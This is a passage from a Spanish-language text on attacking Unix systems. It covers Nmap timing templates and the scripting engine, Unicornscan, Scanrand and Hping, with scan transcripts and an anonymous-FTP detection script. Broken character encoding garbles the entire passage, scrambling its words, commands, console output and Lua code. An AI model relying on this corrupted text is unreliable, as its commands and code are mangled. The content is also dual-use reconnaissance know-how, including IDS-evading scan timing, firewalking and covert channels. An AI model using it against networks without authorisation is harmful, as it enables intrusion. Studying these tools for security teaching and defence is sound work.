o"ci8n C((source("ort hnroUdeU"uertoeD o C(g hnroUdeU"uertoeD obliga a que @ a" utilice un "uerto origen /ijo en todo el escaneo# "ara tratar de /iltrarse "or estos C$uecosD. :a desventaja está en que i "ide la "aralelizaci8n del escaneo# ' "or lo tanto será aneja t)"ica ente sobre él# es ás lento. !or el lado de 25!# co o es un "rotocolo sin estado# ' 5@, es un "rotocolo que se u' Gtil co binar esta o"ci8n con el ensaje "ará etro 5-H as) se "uede si ular ante el /ireIall que el "roviene de un ,ervidor 5@, ' "asar el escaneo 25! "or él. /on=i)uraci-n del esquema de tempori3aci-n a utili3ar% ,i bien @ a" "osee uc$as o"ciones "ara con/igurar al á9i o los timers a utilizar en el "ortscan# e9isten ta bién "lantillas# esque as o templates "rede/inidos de ante ano# gracias a la o"ci8n C(F h"lantillaeD o C(FnG eroD# donde el "ará etro "uede ser% .. paranoid ;C"aranoicoD>% Es la con/iguraci8n de escaneo inutos entre probes. Evita en teor)a la gran ás lenta ' conservadora "osible. Escanea los "uertos en serie# ' es"era "or 5 a'or)a de los 75,s. *. snea:! ;CcautelosoD>% Es"era "or *5 segundos entre probes# ' ta bién
*-2 Ler Plosario% 5MQ% Qona 5es ilitarizada# "ág. *02. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 05 de 2*.

Ca")tulo J. ( J.2.@ a" N Más ?"ciones

realiza el escaneo en serie. Es un balance entre velocidad ' "osibilidades de evitar 75,s. 2. polite ;CeducadoD>% Este tiene odo es Gtil si la red es "oco con/iable ' uc$as ca)das# o tiene "oco anc$o de bandaH @ a" es"era "or odo "or de/ecto# que ade ás inclu'e la "aralelizaci8n ilisegundos entre "robesH es

.#1 segundos entre "robes# que ta bién son en serie. -. normal% Es el de los probes. 1. a))resive ;CagresivoD>% Es"era "or *. conveniente "or sobre el de red. 5. insane ;CinsanoD>% ,8lo sirve si se dis"one de una e9celente cone9i8n ' se "re/iere sacri/icar "recisi8n en "os de velocidad# 'a que s8lo es"era "or 5 ilisegundos entre probes. 5e todas /or as# cabe resaltar que el tie "o entre probes no es el Gnico "ará etro que con/igura auto ática ente el te "late elegido# sino que cada uno es una co binaci8n de C(( a9(rtt(ti eoutD# C((initial(rtt( ti eoutD# C(( a9(retriesD# C(($ost(ti eoutD# etc. Aleatori3ar los 9osts a escanear% ,i se está escaneando una red con uc$os $osts# es ás "robable que "ase desa"ercibido un scan ClentoD ' aleatorio en el sentido de los $osts a enviar los probes. :a o"ci8n C(( rando ize($ostsD activa esta caracter)stica. odo nor al si se "osee una buena cone9i8n

J.2.-. 7nter/az Prá/ica ( Qen a"
5esde la versi8n 1.5. ;5icie bre de 2..+># @ a" inclu'e Qen a"# una inter/az grá/ica la inter/az ulti"lata/or a# renovada ' ejorada con res"ecto a la anterior ;@ a"FE># con la gran a'or)a de o"ciones de consola dis"onibles ta bién desde

is a. Esto "er ite en "ri era instancia que usuarios no e9"ertos

"uedan e9"eri entar sin conocer "revia ente las o"ciones de la consola. Ade ás# /acilita el guardado de in/or es de escaneos "revios# co binar ' co "arar varios resultados# $acer varios escaneos al "er/iles co "letos de escaneo. is o tie "o ' crear

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 0J de 2*.

Ca")tulo J. ( J.2.@ a" N Más ?"ciones

7lustraci8n +% Ca"tura de !antalla de Qen a" $aciendo 2 escaneos a la vez

J.2.1. Motor de ,cri"ting%
Fa bién en la versi8n 1.5.# @ a" incor"or8 otra caracter)stica que lo $ace uc$o ás "oderoso ' que /ue desarrollada durante largo tie "o% el @,E ;Gmap Scripting 3ngine N Motor de ,cri"ting de @ a">.
S@MA!U@,ET

Básica ente consiste en la "osibilidad de i "le entar scri"ts*-- o /rag entos de c8digo /uncionales que a "l)an las ca"acidades inclu)das en el so/tIare# con di/erentes objetivos# co o "or eje "lo% 4roceso de descu(rimiento de Red% 5ado el caso# si se escanea una 2<:# se "uede buscar auto ática ente en bases de datos "Gblicas "or in/or aci8n Gtil.

Detecci-n de Bersiones más poderosa% Co o se vio anterior ente# si

*-- Ler Plosario% ,cri"t# "ág. *01. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 0+ de 2*.

Ca")tulo J. ( J.2.@ a" N Más ?"ciones

bien el /inger"rinting basado en e9"resiones regulares es "oderoso# no sie "re obtiene toda la in/or aci8n "osible# co o sucede con el "rotocolo ,MB ' @F,. 2n scri"t en el @,E "uede recabar caso o en otros.

ás in/or aci8n en este

Detecci-n ! Fxplotaci-n de Bulnera(ilidades% ,i un aviso de seguridad se "ublica ' se dis"one de la "rueba de conce"to# con un scri"t en @ a" se "uede $acer un rá"ido c$equeo del estado de esta vulnerabilidad. :o is o sucede uc$os $osts con res"ecto a con la e9"lotaci8n de

vulnerabilidades# segura ente de i "ortancia "ara los penetration testers. @ a" inclu'e en su distribuci8n "or de/ecto varios scri"ts listos "ara ejecutarse# ' 'a que están basados en el lenguaje :2A*-1# son de lectura# análisis ' u' sencilla odi/icaci8n. !or eje "lo# uno de estos co "rueba si un

servicio FF! "er ite login del usuario Canon1mousD# co o se "uede ver en la Consola 21H "or su "arte# el c8digo /uente se inclu'8 en la Consola 25.
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap &&scriptR./anon+2*.nse &< &s- &p 21 192.168.0.100 .tarting Nmap +.60 9 'ttp:;;nmap.org : at (00)-0+-09 (1:31 #$T 8nitiating #$P Ping .!an at (1:31 .!anning 19(.16).0.100 -1 port0 ,omp"ete7 #$P Ping .!an at (1:314 0.0( e"ap e7 91 tota" 'o t : 8nitiating ./N .tea"t' .!an at (1:31 .!anning t unami 919(.16).0.100: -1 port0 Di !o@ere7 open port (1;t!p on 19(.16).0.100 ,omp"ete7 ./N .tea"t' .!an at (1:314 0.0( e"ap e7 91 tota" port : .,$8PT <NH8N<: 8nitiating !ript !anning. 8nitiating .,$8PT <NH8N< at (1:31 ,omp"ete7 .,$8PT <NH8N< at (1:314 +.73 e"ap e7 ?o t t unami 919(.16).0.100: appear to be up ... goo7. 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< 21/tcp open 6tp ON %nonDmous +2*: +2*: %nonDmous login allo>ed 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: $ea7 7ata fi"e from: ;'ome;mar!e"o; r!;nmap; 'are;nmap Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 5.3)3 e!on7 $a> pa!6et ent: ( 9)6C: F $!@7: ( 9)6C: marcelo@saturno:~/src/nmap/bin$

Consola 21% Eje "lo de un scri"t @,E en ejecuci8n

Ade ás de i "le entar el "uedan reutilizar c8digo ' sean lo

otor del lenguaje# @,E inclu'e una A!7 o ás co unes "ara que los scri"ts o ento# s8lo ás sencillos "osibles. =asta el

biblioteca con las /unciones ' "rotocolos
*-1 ,itio 4eb del lenguaje :2A% $tt"%&&III.lua.org

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 0O de 2*.

Ca")tulo J. ( J.2.@ a" N Más ?"ciones

dos ti"os de scri"ts son so"ortados% 4or servicio% ,e ejecutan cada vez que un "uerto abierto es detectado# ' su salida se uestra en la /ila res"ectiva de dic$o servicio en el in/or e de a'or in/or aci8n. @ a"H $a' dis"onibles varios scri"ts que detectan ciertos servicios con ás "recisi8n o con

4or 9ost% ,on ejecutados "or $ost a escanear# 'a que "ueden estar asociados a tareas con el no bre de do inio# situaci8n dentro de la <ed destino ' su /ireIall# 7!# etc.

i71V#nonEmou BTPV 7e !ription1V,'e!6 to ee if a BTP er@er a""o> aut'or 1 V<77ie Ce"" TeY"be""Igmai".!om>V "i!en e 1 V.ee nmap ,OP/8NH for "i!en!eV !ategorie 1 aVintru i@eVb require V 'ortportV portru"e 1 'ortport.portAorA er@i!e9(14 VftpV: a!tion 1 6unction9'o t4 port: local o!6et 1 nmap.ne>A o!6et9: local re u"t local tatu 1 true local i #non 1 6alse local errA!at!' 1 6unction9: o!6et:!"o e9: end local trE 1 nmap.ne>AtrE9errA!at!'9::

anonEmou

"ogin V

o!6et: etAtimeout95000: trE9 o!6et:!onne!t9'o t.ip4 port.number4 port.proto!o":: trE9 o!6et: en79VK.<$ anonEmou [r[nV:: trE9 o!6et: en79VP#.. 8<K erI[r[nV:: >Iile tatu do tatu 4 re u"t 1 o!6et:re!ei@eA"ine 91:L i6 tring.mat!'9re u"t4 VW(30V: tIen i #non 1 true brea= end end o!6et:!"o e9: i69i #non: tIen return VBTP: #nonEmou end en7 "ogin a""o>e7V

Consola 25% Fuente del ,cri"t "ara @,E que detecta si un ,ervidor FF! ace"ta login an8ni o

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 00 de 2*.

Ca")tulo J. ( J.-.2nicornscan

J.-. 2nicornscan
:os desarrolladores de 2nicornscan lo de/inen co o un frame.ork)0D distribuido de Est) ulo&<es"uesta utilizando co o i "le entar un stac6 FC!&7! distribuido en ser rá"idoD. Algunas de sus caracter)sticas

edio la red# "or lo que no

s8lo es un "ort scanner. ,e distribu'e bajo la licencia P!: v2# ' su objetivo es odo usuario*-J. Está diseBado "ara is o que Csola ente ser Cescalable# "reciso# /le9ible ' e/icienteD*-+# que no es lo ás i "ortantes son%

Escaneo FC! asincr8nico sin estado# con todas las co binaciones de banderas FC!. 5anner @rabbing FC! asincr8nico# sin estado. Escaneo asincr8nico 25! de "rotocolos es"ec)/icos ;env)a lo su/iciente en el "a'load 25! "ara obtener una res"uesta>. 7denti/icaci8n activa ' "asiva del ,iste a ?"erativo ' a"licaciones# analizando las res"uestas. :og ' Filtrado de arc$ivos !CA!*-O ,alida a Bases de 5atos relacionales "ara "osterior análisis. ,o"orte de 8dulos "ersonalizados ;'a que "rovee una A!7>. Listas "ersonalizadas de conjuntos de datos. Mide el caudal ;o Ct roug putD2 de entrada&salida de la red en "aquetes "or segundo ;!!,>. ,u arquitectura está basada en "rocesos ;no $ilos*-0># ' una uestra del

● ●

● ● ● ● ●

is o en /unciona iento se encuentra en la 7lustraci8n O S2@7C?<@U5EFC?@T# donde se "uede ver un !ort ,can distribu)do.

*-5 Ler Plosario% Fra eIor6# "ág. *02. *-J El so/tIare en C odo usuarioD es aquel que es ejecutado "or el ,? co o un "roceso usuario# ' bajo sus "rivilegios# a di/erencia de los "rocesos o *-+ ,itio del !ro'ecto 2nicornscan% $tt"%&&III.unicornscan.org& *-O !ca" es la librer)a ás "o"ular "ara ca"tura ' al acena iento de "aquetes de redH la a'or)a de sni//ers# scanners ' analizadores de red lo utilizan. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&!ca" *-0 Ler Plosario% =ilos ;F$reads># "ág. *0-. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.. de 2*. C odo nGcleoD ;o kernel>. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&RernelU ode ás del 8dulos que se ejecutan en el

Ca")tulo J. ( J.-.2nicornscan

7lustraci8n O% Esque a de !rocesos 5istribu)dos Enviadores&<ece"tores de 2nicornscan

En "rinci"io# con los co "onentes se"arados se "uede a"reciar la

a'or

inde"endencia ' "otencial escalabilidad# $asta el "unto de "oder construir un cluster*1. de nodos co o "ortscanner# analizadores de red# o lo que se necesite ;recordar el co "orta iento Cest) ulo&res"uestaD de 2nicornscan>. !ara esto es necesario i "le entar el anejo FC! "or s) is o# dejando de lado el del nGcleo del ,iste a ?"erativo donde se ejecute. :os co "onentes "rinci"ales son tres%

C/aster &ontrolD% Es un Gnico "roceso que tiene el control de todas las o"eraciones# qué se debe enviar# quién lo debe $acer# global de la ejecuci8n del "rogra a. antiene los estados de las cone9iones# las res"uestas# etc. En resu en# i "le enta la l8gica Unisend% Es un "roceso que s8lo se encarga de enviar "aquetes "or la red. !uede $aber varias instancias de ellos en un o ento deter inado. Unilisten% Es el "roceso que s8lo se encarga de escuc$ar "or res"uestas# ' devolverlas al /aster &ontrol. 2nicornscan# "ara lograr escalabilidad ' velocidad# utiliza el is o étodo

de

anejo asincr8nico ' sin estado de cone9iones FC! ;C,K@ cookies inversoD>

que el siguiente "ort scanner# ,canrand.

*1. Cluster% Conjunto de co "utadoras que trabajan en gru"o ' actGan co o un nodo Gnico e indivisible# en "os de lograr un objetivo su ando el recurso de cada uno de sus co "onentes. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUcluster Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.* de 2*.

Ca")tulo J. ( J.-.2nicornscan
marcelo@saturno:~/src/unicornscan/bin$ u7o .;uni!orn !an -@ !i!"on a77ing 19(.16).0.30;3( mo7e cT,P !anJ port c74941141341)4194(1(34(54374394+(4+9450453465467-70479-)14))49)41004105-10741091114113411)411941(341(941354137-1394?...@J pp 300 u ing interfa!e9 : et'0 !aning 1.00eP00 tota" 'o t >it' 3.3)eP0( tota" pa!6et 4 'ou"7 ta6e a "itt"e "onger t'an ) .e!on7 en7er tati ti! (9+.+ pp >it' 33) pa!6et ent tota" "i tener tati ti! ) pa!6et re!ie@e7 0 pa!6et 7rope7 an7 0 interfa!e 7rop T,P open ftp(10 from 19(.16).0.30 tt" 6+ T,P open '((0 from 19(.16).0.30 tt" 6+ T,P open 7omain530 from 19(.16).0.30 tt" 6+ marcelo@saturno:~/src/unicornscan/bin$

Consola 2J% Escaneo de "uertos con 2nicornscan

J.1. ,canrand
Este "ortscanner está inclu)do en una CsuiteD de $erra ientas de seguridad lla ada C!a6etto ReiretsuD*1*# desarrollada "or 5an Ra ins6'. Fiene co o "ri er ' ás i "ortante objetivo $acer su trabajo lo más rápido posi(leK ade ás# "osee un diseBo "arecido al de 2nicornscan ;aunque éste es "osterior>. :a di/erencia "rinci"al reside en que ,canrand no "osee un "roceso de control aestro ;no lo necesita# 'a que s8lo es un !ort ,canner># ' no crea @ "rocesos CenviadoresD o senders. En su que s8lo env)e la eta de alcanzar el á9i o rendi iento en un escaneo# esta $erra ienta innov8 en algunos as"ectos. !or eje "lo# al i "le entar un "roceso ensajes ' otro que s8lo los reciba sin co unicarse entre s)H ' ejorar# en un "roceso de es"acio del usuario# "arte de ta bién al i "le entar '

áquina /inita de estados de FC!*12. !ara esto su autor# 5an Ra in6s'# desarroll8 la técnica del C7nverted ,K@

Coo6ieD# o ,K@ Coo6ie 7nverso# que intenta a"licar la técnica de las ,K@ Coo6ies*1- "ero del lado del cliente ;quien realiza el "ortscan>. A grandes rasgos S,A@,U,CA@<A@5T# ,canrand /unciona de la siguiente anera% I. Crea un "roceso CenviadorD ;sender> ' el "roceso "rinci"al se convierte en CrecibidorD o Cescuc$adorD ;listener o receiver>. Penera un nG ero CclaveD o Cse illaD ;seed># aleatorio "or de/ecto# que se utilizará en toda la
*1* 2<:% $tt"%&&III.do9"ara.co & *12 !ara ver la F,M ;Finite State /ac ine N Máquina de Estados Finitos> de FC!# ir al Ane9o A. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.2 de 2*.

Ca")tulo J. ( J.1.,canrand

ejecuci8n del "rogra a. II. Al "roceso enviador s8lo le dice qué $osts ' "uertos debe escanear# enviándole ta bién la clave a utilizar. III. Este s8lo env)a los ,K@s a los destinos corres"ondientes ' ter ina# "ero utilizando co o 7,@*11 el resultado de la siguiente /8r ula*15%
IANOTruncar D81A/.A8A.7 DDI40ri)II4DestI4to0ri)I4toDestE% /laveE% ;+(itsE

5onde =MAC es un algorit o "ara generar un c8digo de autenticaci8n del ensaje*1J. Ka que en un escaneo $abrá s8lo una Gnica co binaci8n de
)I+

estos cinco "ará etros# cada IAN )enerado por esta =-rmula es 'nico# ' "odr)a considerárselo un as . Este valor es lo que se lla a C,K@ odo "ro iscuo ;es "or Coo6ieD# ' es inverso "orque se lo calcula en el cliente ' no en el servidor. IB. El "roceso que escuc$a "or res"uestas lo $ace en esto que "ara ejecutar ,canrand es necesario tener los "rivilegios adecuados>. !or cada "aquete que recibe o Cca"turaD el $ost# ,canrand se encarga de veri/icar que esté dirigido a él# 'a que "uede que el is o sea "roducto del escaneo o no ;otro trá/ico del $ost>. :a Gnica in/or aci8n que utiliza "ara $acerlo es el "aquete recibido en s) ' la clave generada al co ienzo. B. El étodo de veri/icaci8n consiste en% 7. Ca"turar un "aquete dirigido al $ost. +. El "aquete "ertenece a ,canrand si% a. El "a'load 7! contiene un "aquete del "rotocolo 7CM!# o
*1- :a técnica de las ,K@ Coo6ies /ue desarrollada en *00J co o res"uesta a los ataques de Cinundaci8n de ,K@sD ;,K@ floods>. Consiste en que el ,?# teniendo "rocesos en odo :7,FE@# no reserve recursos "ro"ios cuando recibe un ,K@# sino descartarlo# ' devolver el ,K@_ACR al cliente con una /ir a un)voca en el nG ero de secuencia inicial FC!. 5ic$a /ir a es el resultado de cierta in/or aci8n del ,K@ original# a"licada a una /unci8n de dis"ersi8n ; as >. Al recibir el ACR corres"ondiente# el ,? "uede identi/icar si corres"onde a una cone9i8n válida o no# veri/icando una "osible /ir a en el ca "o @G ero de ACR FC!. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,'nUcoo6ies# $tt"%&&en.Ii6i"edia.org&Ii6i&,K@U/lood *11 !ara ver qué es un 7,@# ir a la "ágina J0. *15 En dic$a /8r ula# el s) bolo C_D signi/ica concatenaci8n. ,canrand la trunca a -2 bits ;=MAC(,=A(* genera un $as$ de *J. bits> "ara que "ueda ser al acenada en el ca "o ,EV del encabezado FC!. =a' que tener en cuenta esto reduce la e/ectividad del algorit o ,=A(*. *1J !ara ás in/or aci8n sobre =MAC# ver% $tt"%&&en.Ii6i"edia.org&Ii6i&= ac *1+ Ler Plosario% =as$# "ág. *0-. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.- de 2*.

Ca")tulo J. ( J.1.,canrand

(. Es FC! ' el /lag de ,K@_ACR activado# o c. Es FC! ' el /lag <,F_ACR están activados# o d. Es FC! ' el /lag <,F está activado. e. En caso contrario# "asar al siguiente "aquete ca"turado ;7r a *>. ;. ?btener el @G ero de ACR del ca "o FC! ' restarle *. Este valor es igual al 7,@ que recibi8 el destino. IAN+ O A/J.7. <. Penerar el 7,@ "ara la co binaci8n 7! ?rigen# 7! 5estino# !uerto ?rigen# !uerto 5estino# Clave# de la ; enos la clave# claro está>.
IANOTruncar ;+(itsE D81A/.A8A.7 DDI40ri)II4DestI4to0ri)I4toDestE% /laveE%

is a /or a que el "roceso

CenviadorD# pero tomando estos valores del paquete capturado

. ,i 7,@ a 7,@2# el "aquete "ertenece a una res"uesta a un probe de ,canrand. #. ,e evalGa el&los /lags FC! o 7CM! que contiene el "aquete# "ara ostrar "or la salida el resultado del "robe "ara dic$o "uerto ;abierto# cerrado# etc.>.
root@ubuntu&ser<er:~A !anran7 -b13 -t 1 19(.16).0.1-(5+: qui!6 KP: 19(.16).0.100:)0 -010 (.1(+ root@ubuntu&ser<er:~A !anran7 -b13 -t 3 19(.16).0.1-(5+: qui!6 KP: 19(.16).0.100:)0 -010 (.091 root@ubuntu&ser<er:~A !anran7 -b13 -t 5 19(.16).0.1-(5+: qui!6 KP: 19(.16).0.100:)0 -010 (.0(+ KP: 19(.16).0.1:(1 -0(0 15.350 KP: 19(.16).0.30:(1 -010 15.930 KP: 19(.16).0.100:(1 -010 17.330 KP: 19(.16).0.(0:(( -010 (0.)(9 KP: 19(.16).0.30:(( -010 (1.031 KP: 19(.16).0.1:(3 -0(0 (5.551 KP: 19(.16).0.100:(3 -010 (7.5(9 root@ubuntu&ser<er:~A

Consola 2+% Ejecuci8n de ,canrand con di/erentes tie "os de es"era

,canrand en s) no "osee "ara que utilice

uc$os "ará etros# "ero "er ite ser con/igurado ás rá"ido

enos anc$o de banda ;"or de/ecto env)a "aquetes lo

que "uede># es"ere "or res"uestas una cierta cantidad de tie "o# utilice una se illa en "articular# etc. 2na ejecuci8n de eje "lo se uestra en la Consola 2+# donde se le indica a ,canrand que escanee una subred de 25J $osts# utilice * MB&seg. del anc$o de banda ;(b*M># ' es"ere *# - ' $asta 5 segundos "or res"uestas coincidentes. Es aqu) donde "uede a"reciarse la "osibilidad de ignorar
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.1 de 2*.

Ca")tulo J. ( J.1.,canrand

"aquetes que "rovienen una res"uesta.

ás tarde# segGn la cantidad de tie "o que se es"era "or

En conclusi8n# el "roceso de escaneo de "uertos de ,canrand es asincr8nico# escalable ' uc$o ás rá"ido que un escaneo secuencial ;"uerto "or "uerto ' $ost onitoreo# aunque está bien claro que no es la "or $ost>. :a desventaja que tiene es que es "oco "robable que "ase desa"ercibido "ara los 75,s o $erra ientas de intenci8n de ,canrand evitarlasH ade ás# $a' que tener en cuenta que en este caso la velocidad va en des edro de la "recisi8n. Es "or esto que ,canrand "uede ser u' Gtil "ara redes locales grandes ' rá"idas# con buen anc$o de banda ' baja latencia# o donde no i "orte "asar desa"ercibido "ara el ad inistrador.

J.5. Mani"ulaci8n de !aquetes% ="ing
="ing*1O es una $erra ienta de seguridad in/or ática a "lia ente reconocida "or el a "lio abanico de "osibilidades que o/rece# 'a que "er ite ani"ular en un nivel relativa ente bajo*10 qué ti"o de "aquetes se enviarán "or la red# "ara luego quedarse a la es"era de res"uestas ;tal co o lo $ace el co ando "ing># ' luego ostrarlas "or la consola. u' rá"ida ente# en ="ing- ;"ublicada ás su "otencial ' antiene la ,i bien la versi8n 2 se $izo "o"ular

en el aBo 2..5> su creador# ,alvatore ,an/ili""o# incor"or8 un intér"rete e bebido del lenguaje FC:*5.# con el objetivo de a "liar aGn "er itir ejecutar scri"ts de la is a /or a*5* que @ a" dos aBos des"ués

"er iti8 $acer. Ade ás de estar reescrito en dic$o lenguaje# ="ing a'or co "atibilidad "osible con su versi8n anterior ;escrita en C>. !er itiendo al usuario la "ersonalizaci8n

inuciosa de los "aquetes FC!&7!

que se env)an# ="ing ;segGn su "ágina Ieb> "er ite realizar%
● ●

!ruebas de reglas de /ireIalls ' /unciona iento de 75,s&7!,s. !ort ,canning avanzado# co o "or eje "lo el 7dle ,can ;no casual ente# 'a que el autor de ="ing /ue el que desarroll8 este ti"o de "ortscan>.

*1O ,itio Ieb del !ro'ecto ="ing% $tt"%&&III.$"ing.org& *10 A la de/inici8n C ani"ulaci8n de "aquetesD se la "uede asociar con Cpacket craftingD en el idio a inglés. !ara ás in/or aci8n# ver% $tt"%&&III.securit'/ocus.co &in/ocus&*+O+ is o objetivo que @ a"H la distribuci8n estándar de ="ing *5. !ágina o/icial del lenguaje FC:% $tt"%&&III.tcl.t6& *5* ="ing- inclu'e una A!7 con el inclu'e algunos scri"ts en lenguaje FC: ' que $acen uso de ella. Ler este enlace "ara conocer ás sobre sus /uncionalidades% $tt"%&&Ii6i.$"ing.org&-1 Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.5 de 2*.

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

!robar la "er/or ance de la red utilizando di/erentes "rotocolos# ta aBos de "aquetes# valores de F?, 7! ;-1pe of Service H Fi"o de ,ervicio> ' /rag entaci8n de "aquetes. Pat /-U (iscover1)DA ;algo as) co o C5escubri iento del MF2 de la <utaD>. Esta es una técnica "ara averiguar el MF2 ;2nidad á9i a de trans isi8n> de una ruta a un $ost. 5ado que un "aquete "uede atravesar varias redes de di/erentes tecnolog)as ' "or ende# di/erentes valores de MF2# el !at$ MF2 5iscover' "er ite averiguar cuál es el ta aBo á9i o de "aquete 7! "ara que no se lo /rag ente en ningGn salto en su ca ino al destino. Frans/erencia de arc$ivos incluso entre reglas de /ireIall u' restrictivas

;creaci8n de &overt & annels o 5ack (oors>. 2n &overt & annel ;S47R7UC?LC=T#S,A@,UC?LC=T#S<?4UC?LC=T > es un canal de trans isi8n datos oculto# donde se utilizan o a"rovec$an "ro"iedades de la co unicaci8n en /or as di/erentes de las que /ue "ensado original ente# con la intenci8n de $acer "asar la co unicaci8n total ente desa"ercibida. !or eje "lo# con ="ing es "osible trans/erir datos v)a un "rotocolo no "ensado "ara ello# co o 7CM!.

-raceroute bajo todos los "rotocolos so"ortados ;no s8lo 25!>. Es decir# se "uede $acer un traceroute enviando "aquetes 7! con FF: incre entales "ero con "a'load FC!# "or eje "lo.*5Fire.alking. Esta es una técnica derivada del traceroute ;SF4A:RT> que "er ite averiguar las reglas de /iltrado de un /ireIall enviándole "aquetes es"ecial ente "re"arados. Finger"rinting de ,?s. Auditor)a del ,tac6 FC!&7!. Muc$os otros. ="ing ace"ta con di/erentes o"ciones de la l)nea de co andos el odo

● ● ●

;C"ingD "or de/ecto># el ti"o ;7CM!# FC!# 25!> de "aquetes a enviar# as) co o las di/erentes o"ciones de sus encabezados.
*52 !ara ver ás de !MF25% Lisitar $tt"%&&en.Ii6i"edia.org&Ii6i&!at$U tuUdiscover'# o bien ás in/or aci8n sobre Fraceroute# ver el Ca")tulo O de SFC!&7!U7llT.

leer el A"artado **.+ de SFC!&7!U7llT *5- !ara consultar

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.J de 2*.

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

marcelo@saturno:~$ sudo Iping 192.168.0.20 ?P8NH 19(.16).0.(0 9et'0 19(.16).0.(0:: NO B2#H. are et4 +0 'ea7er P 0 7ata bEte "en1+0 ip119(.16).0.(0 tt"16+ DB i7115++( port10 f"ag 1$# eq10 >in10 rtt10.7 m "en1+0 ip119(.16).0.(0 tt"16+ DB i71)79) port10 f"ag 1$# eq11 >in10 rtt11.) m "en1+0 ip119(.16).0.(0 tt"16+ DB i716+01 port10 f"ag 1$# eq1( >in10 rtt10.+ m "en1+0 ip119(.16).0.(0 tt"16+ DB i7115)61 port10 f"ag 1$# eq13 >in10 rtt10.+ m "en1+0 ip119(.16).0.(0 tt"16+ DB i711(55( port10 f"ag 1$# eq1+ >in10 rtt10.+ m --- 19(.16).0.(0 'ping tati ti! --5 pa!6et tran mitte74 5 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 0.+;0.7;1.) m marcelo@saturno:~$ sudo Iping &- &c 1 192.168.0.20 &p 80 ?P8NH 19(.16).0.(0 9et'0 19(.16).0.(0:: . et4 +0 'ea7er P 0 7ata bEte "en1+0 ip119(.16).0.(0 tt"16+ DB i7130+0 port1)0 f"ag 1$# eq10 >in10 rtt10.6 m --- 19(.16).0.(0 'ping tati ti! --1 pa!6et tran mitte74 1 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 0.6;0.6;0.6 m marcelo@saturno:~$ sudo Iping &- &c 1 192.168.0.20 &p 22 ?P8NH 19(.16).0.(0 9et'0 19(.16).0.(0:: . et4 +0 'ea7er P 0 7ata bEte "en1++ ip119(.16).0.(0 tt"16+ DB i71(0075 port1(( f"ag 1.# eq10 >in1163)+ rtt10.5 m --- 19(.16).0.(0 'ping tati ti! --1 pa!6et tran mitte74 1 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 0.5;0.5;0.5 m marcelo@saturno:~$ sudo Iping &&scan 22580 &- &c 2 192.168.0.20 .!anning 19(.16).0.(0 919(.16).0.(0:4 port ((4)0 ( port to !an4 u e -= to ee a"" t'e rep"ie P----P-----------P---------P---P-----P-----P-----P FportF er@ name F f"ag Ftt"F i7 F >in F "en F P----P-----------P---------P---P-----P-----P-----P (( ' : ....#... 6+ +3031 163)+ ++ #"" rep"ie re!ei@e7. Done. Not re pon7ing port : marcelo@saturno:~$

Consola 2O% FC! !ing ' !ortscan con ="ing

En la consola 2O se "uede ver "ri ero la ejecuci8n de ="ing sin o"ciones# la cual corres"onde a un C"ingD FC! @ull al "uerto destino nG ero . ;'a que no se seleccionaron otros Flags o algGn "uerto>. :uego# sie "re dentro del "uerto 22 ;(" 22>. ,i bien el si "les# ="ing "rovee el odo C"ingD# se intenta enviar un ,K@ ;(,> una Gnica vez ;(c *> al "uerto O. ;(" O.> ' al odo C"ingD "uede servir "ara $acer escaneos ás acorde a la o"eraci8n. odo CscanD ;((scan h"uertose> "ara es"eci/icar

intervalos de "uertos# con una salida

!ara con/igurar los di/erentes /lags en el encabezado FC!# "ueden utilizarse
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.+ de 2*.

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

cualquier co binaci8n de las letras corres"ondientes en letra

a'Gscula% (F

;F7@># (, ;,K@># (< ;<,F># (! ;!,=># (A ;ACR># (2 ;2<P>. Fa bién "ueden de/inirse en los "aquetes a enviar cualquier valor del encabezado FC! ;"or eje "lo ((Iin# ((setseq# ((setac6.># 7! ;((ttl# ((id# ((i""roto# ((Iinid# etc.># 7CM! o 25!H en la salida se uestran /inal ente los valores que se utilizan.

